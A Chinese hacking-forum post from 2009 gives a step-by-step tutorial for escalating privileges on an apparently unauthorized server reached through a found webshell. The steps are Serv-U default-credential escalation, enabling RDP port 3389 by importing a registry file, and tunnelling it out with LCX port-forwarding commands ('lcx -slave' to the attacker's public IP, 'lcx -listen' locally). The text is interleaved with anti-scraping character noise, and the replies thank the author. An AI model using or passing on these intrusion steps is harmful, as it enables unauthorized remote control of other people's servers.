|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
原创作者:huar % z, V( d* u" i2 x) P8 N! l3 q8 P# V
原创出处:3.A.S.T 网络安全技术团队
9 @( d$ S8 Z+ k1 d9 u/ @
6 `5 p' Q% b+ o; A5 B5 e8 m5 i% `0 T简单的提权教程,希望给还不会提权的兄弟们简单介绍下。
% m$ A; r% n0 @6 v9 S之前的一个shell,在翻看记事本的时候找到的,大致看了下,shell权限还是非常大的,于是就试试提下权。
1 i" U- S' w3 S4 D! d
6 ?; `2 A! l7 k6 p提权方法:SERU-U+LCX端口转发+注册表开3389端口7 x2 j! d; t4 q
' {1 K8 f5 Z" e$ T
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先上传个cmd试下可以运行,在查看服务器开的端口时,发现服务器开了4899、43958等端口,是没有开3389端口的(截图提权之前未截取,抱歉``)。 于是我就试下常用的Serv-U提权了,如果管理员大叔照顾我们这些小菜的话,那就太好了..
2 |' @5 h- M! s9 r, f% `# N% [3 F5 Q$ Z- w3 ^4 O1 z
; }! q( `2 a- l9 u, {1 p$ U- q
/ P& |8 `9 ^2 q9 K }先用默认账号密码试试,不过很幸运的是用默认账号密码提权成功了,嘿嘿``没想到管理员大叔这么照顾俺们这些小菜..接下来的路就好走多了~~
, N4 J, n6 G' _7 b9 ?5 ^ o
9 n _% g( W t' M前面说了,服务器是没有开3389端口的,工欲善其事必先利其器,由于现在我手中没有免杀的开3389端口的工具,所以我们就想想其它的办法吧``最后想了下,我们可以用导入注册表的方法开启服务器的3389服务端口,最后上传个开3389的注册表文件,在Serv-U命令下成功导入,3389端口成功开启.8 W/ p/ C- |9 E1 }
' ]$ p) p' I! `; G5 |" r5 ]' `) ~3 z" D: h% P/ L2 i
还有就是服务器是在内网了,那我们就要用LCX做端口转发。, W: ]; i: i# a- h+ S# {
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) 3389, E0 ?- X3 K% Q1 s6 u5 f
本地机器运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)+ k" Y. _. R! M7 Q( b& H
3 }1 {/ V! v) V6 ?1 U
具体的可以参考下呆呆版主做的视频教程,做的非常详细,在这里就不再多说什么了。, e% i7 b$ A. o3 F3 \1 C
9 M+ P# j7 E6 ]6 G/ n
% M7 r) B7 E. c* G
最后就是我的机器也在内网,LCX 转发端口到本地必须用公网ip,这个好办,路由器里有DMZ,可以用下这个功能的``嘿嘿~~
% G; T/ E+ C+ @$ Q0 a" g4 _& h: W* E, T; k
V; K; u! Y6 v+ i+ z% v7 Q# ]
4 Q# v, N3 Q/ }4 s. _# O* @
最后远程连接成功```
' E! g' b, B3 p& H
: {. W$ |. a4 I& G0 H
: g' C0 @# ]* N
' J+ v6 I8 H% B& r% s前几天还在议论INTEL和AMD的服务器处理器的问题呢``这次就遇见个AMD的服务器,嘿嘿`````' i; V5 i8 `$ L& P4 s* T1 P
感觉速度还可以```` |
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-6-27 18:59
| 
发表于 2009-6-28 13:03
| .gif)
发表于 2009-6-29 09:32
| 
受益了